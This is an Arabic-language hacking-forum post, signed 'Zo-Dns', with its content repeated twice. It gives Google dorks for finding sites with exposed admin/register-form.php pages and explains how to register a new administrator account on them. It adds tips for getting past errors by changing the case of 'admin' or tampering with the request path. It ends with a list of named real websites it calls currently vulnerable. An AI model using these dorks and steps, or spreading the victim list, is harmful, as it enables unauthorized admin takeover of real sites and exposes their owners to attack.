Zo-Dns
w0r|D./exit
السلام عليكم ..
استغلال خطا برمجي يسمح بانشاء يوزر وباس جديد بصفة admin ..
بتعامل مباشر مع قواعد البيانات ..
dork
======
بعد وجود login-from.php ... ستجد خاصية الاستغلال بدرجة 90% ..
site/admin/login-from.php
exploit ... site/admin/register-from.php
ضهور
First Name
Last Name
Login
Password
Confirm Password
اعتيادي التسجيل .. ثم الرجوع ل login-from.php وتدخل باالبيانات ..
ملاحظة ..ضهور اخطااء بعض المرات .. يمكن التلاعب بالاحرف admin / Admin او اللتلاعب بمسار الطلب ..
=======
مواقع كثيرة مصابة حاليا
استغلال خطا برمجي يسمح بانشاء يوزر وباس جديد بصفة admin ..
بتعامل مباشر مع قواعد البيانات ..
dork
كود:
inurl:/admin/login-form.php
inurl:/admin/register-form.phpبعد وجود login-from.php ... ستجد خاصية الاستغلال بدرجة 90% ..
site/admin/login-from.php
exploit ... site/admin/register-from.php
ضهور
First Name
Last Name
Login
Password
Confirm Password
اعتيادي التسجيل .. ثم الرجوع ل login-from.php وتدخل باالبيانات ..
ملاحظة ..ضهور اخطااء بعض المرات .. يمكن التلاعب بالاحرف admin / Admin او اللتلاعب بمسار الطلب ..
=======
مواقع كثيرة مصابة حاليا
كود:
[LEFT]
http://www.silverlinksoftware.com/admin/register-form.php
http://praxistek.com/angry//admin/login-form.php
http://www.houseofrestoration.co.za/admin/login-form.php
http://bistro-monroe.ro/admin/login-form.php
http://www.iliri.website.org/html/me_iframes/php_pages/login/admin/register-form.php
[/LEFT]